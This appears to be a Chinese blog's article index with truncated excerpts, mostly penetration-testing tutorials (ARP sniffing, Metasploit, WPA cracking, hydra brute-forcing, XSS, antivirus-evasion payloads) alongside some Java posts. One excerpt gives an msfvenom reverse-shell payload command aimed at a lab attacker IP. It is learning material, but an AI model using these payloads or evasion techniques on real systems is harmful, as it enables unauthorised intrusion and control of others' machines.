ubuntu 安装 apktool

进入官网Apktool install 可以看到这些 Download Linux wrapper script (Right click, Save Link As apktool)Download apktool-2 (find newest here)Make sure you h...

2017-12-19 11:25:37

阅读数 115

评论数 0

如何理解云计算?很简单,就像吃货想吃披萨了

如何理解云计算?很简单,就像吃货想吃披萨了... [日期:2015-04-13] 来源:云计算头条微信公众号  作者: [字体:大 中 小] 你一定听说过云计算中的三个“高大上”的你一定听说过云计算中的三个“高大上”的概念:IaaS、PaaS和S...

2017-11-16 10:27:00

阅读数 186

评论数 0

未来数据中心网络的三大武器: SDN、Overlay、VDC

短短几年间,很多人从不知道什么是SDN、Trill、VXlan,对这些技术不屑一顾,到现在几乎每个数据中心都在谋求转型,每个从事信息技术的人如果还不知道这些单词是什么就Out了,就像这年头还不用微信一样,跟不上主潮流了。 当然这些新技术之所以被提出来,并得到很多人的响应和热捧,是因为随着应用...

2017-09-27 10:23:34

阅读数 402

评论数 0

Wireshark实战之局域网监听

直接上手网络工程师的最爱Wireshark.它是一款本地监听数据的大杀器,弊端是只能监听本地的数据,有什么办法可以让局域网中的流量都从本机走呢?第一ARP嗅探,劫持网关,再本地抓包. 第二交换机镜像端口,在路由或者交换机处设置,复制一份数据到指定机子端口. 第三Ap一个无线,让他们连接,然后再...

2017-09-24 11:03:54

阅读数 20313

评论数 2

域环境提权、编辑注册表

Token(令牌),域环境中提权 用户每次登录时,账号绑定临时的token; 访问资源时提交token进行身份验证,类似于web cookie。 Delegate Token:交互会话登录,(例如直接登录、远程桌面登录) Impersonate Token:非交互登录,(例如访问文件共...

2017-09-20 11:27:35

阅读数 586

评论数 0

metasploit port 详细使用方法

信息收集: auxiliary/sniffer/psnuffle 嗅探抓包auxiliary/scanner/http/dir_scanner 扫描网站目录...

2017-09-20 09:20:27

阅读数 912

评论数 0

使用MSF生成的shellcode打造免杀payload

环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 ...

2017-09-19 15:09:03

阅读数 3138

评论数 0

火狐浏览器下burpsuite 抓取https数据包

1.环境 Windows 10火狐浏览器51.0.1burpsuite pro1.711 2.过程 1)本人使用的是burpsuite 的默认代理设置 2)设置火狐的代理服务:选项 –>高级–>网络–>设置 配置成burpsuite 一样的地址和端口 3)在...

2017-09-15 01:17:29

阅读数 286

评论数 0

使用aircrack-ng工具破解wifi密码

目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。 本文将教大家破解用wpa/wpa2加密方式...

2017-09-13 10:35:55

阅读数 901

评论数 0

Linux下使用hydra获取linux和windows系统用户名和密码的教程

本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。 第一步:找到网段内存活的主机 使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下: 在...

2017-09-13 10:26:48

阅读数 327

评论数 0

文件包含漏洞原理分析

文件包含这个漏洞,用我自己的话来说就是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,就像'文件包含'这几个字的字面意思一样,在文件中,包含一个文件。 我在总结这篇文章的时候看了,其他人总结的,感觉别人总结的很是详细,就像一开始我只认为包含只有PHP代码中才存在,后来我再整理复...

2017-09-11 16:33:38

阅读数 810

评论数 0

metasploit之客户端渗透

0x00 概要 我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们想目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来欺骗对方,使其中招。 这篇文章中我们主要会使用到metasploit中的msfv...

2017-09-05 08:48:11

阅读数 688

评论数 0

metasploit获取shell之后进一步利用!metasploit+sessions

当你用metasploit成功的入侵一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用 当你看到了 [*] Meterpreter session 1 opened (192.168.195.140:4...

2017-09-02 16:56:32

阅读数 3817

评论数 0

使用Burp Suite进行XSS渗透测试 (只为自己做个备忘,甚读)

使用Burp Suite进行XSS渗透测试 测试环境:webgoat burp Suite 测试网址:http://192.168.1.104:8080/WebGoat/start.mvc#attack/1406352188/900 1)在输入框中输入!@#$[]()"&qu...

2017-09-01 13:25:12

阅读数 3174

评论数 0

TCP空闲扫描实例

上面一篇笔记简单的介绍了一下 TCP 空闲扫描的原理,现在来动手操作了~ 恩,虽然 Nmap 也提供了一定的扫描空闲主机的功能吧,但是觉得还是 MSF 的 ipidseq 扫描器用起来比较方便,正好可以开始讲讲 MSF 中模块的使用方法。 首先我们启动postgresql数据库服务,打开 MS...

2017-08-28 22:37:09

阅读数 666

评论数 0

TCP空闲扫描原理

TCP空闲扫描是一种隐秘的扫描技术,要知道它的原理,首先要介绍一下一般端口扫描的原理。 判断一个TCP端口是否开放,其中一种方法是向该端口发送一个 SYN(建立会话) 数据包,如果该端口是开放的,则它会返回一个 SYN/ACK(会话确认) 数据包;如果该端口是关闭的,则它返回 RST(重置) 数...

2017-08-28 22:27:21

阅读数 268

评论数 0

常见端口入侵方法剖析

1.21端口渗透剖析 FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理。一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器。这里以Serv_uFTP服务器为例,剖析渗透FTP服务器的几种方法。 (1)对Serv_u5.004以及以下版本可直接...

2017-08-24 11:10:22

阅读数 10485

评论数 0

学习Spring必学的Java基础知识(6)----ThreadLocal

我们知道Spring通过各种模板类降低了开发者使用各种数据持久技术的难度。这些模板类都是线程安全的,也就是说,多个DAO可以复用同一个模板实例而不会发生冲突。我们使用模板类访问底层数据,根据持久化技术的不同,模板类需要绑定数据连接或会话的资源。但这些资源本身是非线程安全的,也就是说它们不能在同一时...

2017-08-14 09:25:01

阅读数 118

评论数 0

学习Spring必学的Java基础知识(2)----动态代理

Spring AOP使用动态代理技术在运行期织入增强的代码,为了揭示Spring AOP底层的工作机理,有必要对涉及到的Java知识进行学习。Spring AOP使用了两种代理机制:一种是基于JDK的动态代理;另一种是基于CGLib的动态代理。之所以需要两种代理机制,很大程度上是因为JDK本身只提...

2017-08-11 10:34:48

阅读数 153

评论数 0

Java反射知识

Java语言允许通过程序化的方式间接对Class进行操作,Class文件由类装载器装载后,在JVM中将形成一份描述Class结构的元信息对象,通过该元信息对象可以获知Class的结构信息:如构造函数、属性和方法等。Java允许用户借由这个Class相关的元信息对象间接调用Class对象的功能,这就...

2017-08-10 16:56:18

阅读数 75

评论数 0

提示
确定要删除当前文章?
取消 删除